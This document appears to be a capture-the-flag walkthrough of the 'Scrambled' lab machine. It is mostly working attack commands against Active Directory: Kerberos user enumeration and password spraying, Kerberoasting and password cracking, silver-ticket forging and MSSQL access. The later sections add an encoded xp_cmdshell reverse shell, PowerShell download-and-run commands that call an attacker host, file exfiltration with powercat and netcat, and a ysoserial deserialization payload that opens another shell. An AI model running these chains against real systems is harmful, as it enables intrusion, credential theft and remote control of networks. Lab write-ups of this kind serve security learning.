scrambled.png

Scrambled#

Enum#

Web documentation

phone internal dial - 08
support@scramblecorp.com
ipconfig > %USERPROFILE%\Desktop\ip.txt
4411 - Sale order client custom app
NTLM has been disabled

Domain names

scramblecorp.com
scrm.local
dc1.scrm.local
hostmaster.scrm.local

Kerberos bruteforcing#

Using Kerbrute for user enumeration

kerbrute userenum \
    -d scrm.local \
    --dc scrambled.htb \
    /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Using Kerbrute for password spraying

kerbrute passwordspray \
    -d scrm.local \
    --dc scrambled.htb \
    ./users.txt \
    ksimpson

Obtaining a TGT#

Granting ourselves a Kerberos TGT based on discovered password

getTGT.py \
    scrm.local/ksimpson:ksimpson \
    -dc-ip scrambled.htb

Enumerating smb shares with the TGT

smbclient.py scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip scrambled.htb -debug -k 

Kerberoasting#

Obtaining a TGS with GetUserSPNs.py

An SPN is the id of a service instance
SPNs are used by Kerberos to associate a service instance with a service logon account
This allows a client to request that the service authenticate an account
even if the client does not have the account name
So basically which GetUserSPNs does is:
it gets the SPNs associated with ksimpson
by requesting TGSes for those, so we get back a TGS
from which we know the SPN of MSSQLSvc/dcq.scrm.local

export KRB5CCNAME=ksimpson.ccache
GetUserSPNs.py \
    -request scrm.local/ksimpson \
    -no-pass \
    -k \
    -dc-host dc1.scrm.local \
    -outputfile kerbrute-key.txt

Using john to crack the TGS

john kerbrute-key.txt --wordlist=/usr/share/wordlists/rockyou.txt
Pegasus60

Silver Ticket Attack#

- Golden ticket - Access to the whole Domain by stealing the krbtgt NT-Hash allowing to forge a TGT  
- Silver ticket - Access to a single service by stealing the svc NT-Hash allowing to forge a TGS  

See BlackHat talk Abusing Microsof Kerberos: Sorry You Guys Don’t Get It
We have all the ingredients to perform a silver ticket attack:

NTHash     - can be derived from sqlsvc's password
Domain SID - The security identifier of the domain
Domain     - scrm.local
SPN        - we got that from GetUserSPN.py
User Id    - uid 500

Get the Domain SID from the PAC - (Privileged Attribute Certificate)

The PAC is an extension to Kerberos tickets that contains useful information about a user’s privileges
This information is added to Kerberos tickets by a DC when a user authenticates to the domain.
The PAC can be read when users use their Kerberos tickets to authenticate to other systems.
This can be leveraged to determine their level of privileges without reaching out to the DC.

getPac.py \
    -targetUser ksimpson \
    scrm.local/ksimpson:ksimpson

Domain SID: S-1-5-21-2743207045-1827831105-2542523200

The info that’s relevant to us here is the Domain SID,
so we could get that from any user in the domain,
as long as we can authenticate with kerberos and get their PAC

getPac.py \
    -targetUser \
    sqlsvc scrm.local/sqlsvc:Pegasus60

Domain SID: S-1-5-21-2743207045-1827831105-2542523200

Make a NT hash from the password we already got from cracking the TGS

https://codebeautify.org/ntlm-hash-generator
or do it like an adult

printf "Pegasus60"|xxd
printf "Pegasus60"|iconv -f ASCII -t UTF-16LE|xxd
printf "Pegasus60"|iconv -f ASCII -t UTF-16LE|openssl dgst -md4
printf "Pegasus60"|iconv -f ASCII -t UTF-16LE|openssl dgst -md4|awk '{print $NF}'
b999a16500b87d17ec7f2e2a68778f05

Generating a “Silver ticket” to access the MsSQL instance

ticketer.py \
-nthash b999a16500b87d17ec7f2e2a68778f05 \
-domain-sid S-1-5-21-2743207045-1827831105-2542523200 \
-domain scrm.local \
-spn MSSQLSvc/dc1.scrm.local \
-user-id 500 \
Administrator

MsSQL Foothold#

Use the “Silver Ticket” TGS to connect to MsSQL with impacket

export KRB5CCNAME=Administrator.ccache
mssqlclient.py -k dc1.scrm.local

Loot the Database

SQL> select name from sys.databases
SQL> select tabe_name from information_schema.tables
SQL> use ScrambleHR
SQL> select * from UserImport
MiscSvc - ScrambledEggs9900 - scrm.local

Use enable_xp_cmdshell to run a shell through MsSQL https://www.revshells.com/

SQL> enable_xp_cmdshell
SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAzACIALAA0ADIANAAyACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Lateral privesc#

Run Nishang’s Invoke-PowerShellTcp.ps1 as scrm\miscsvc

$password = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("scrm\miscsvc", $password)

Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.43:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.43 -Port 4545 } -Credential $creds

Binary reversing and exploitation#

Exfitrate ScrambleClient.exe with powercat

IEX(New-Object Net.Webclient).downloadString('http://10.10.14.43:8000/powercat.ps1')
powercat -c 10.10.14.43 -p 4646 -i C:\Users\miscsvc\Downloads\ScrambleLib.dll
nc -lp 4646 -q 1  > ScrambleLib.dll < /dev/null
powercat -c 10.10.14.43 -p 4646 -i C:\Users\miscsvc\Downloads\ScrambleClient.exe
nc -lp 4646 -q 1  > ScrambleClient.exe < /dev/null

We then need to reverse the binary and dll with dnSpy to figure out that it uses BinaryFormatter.
Which does some insecure deserialisation and will let us execute one more reverse shell

Use the .NET adaptation of ysoserial to craft payload

./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.43:8000/Invoke-TcpReverseShell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.43 -Port 4747"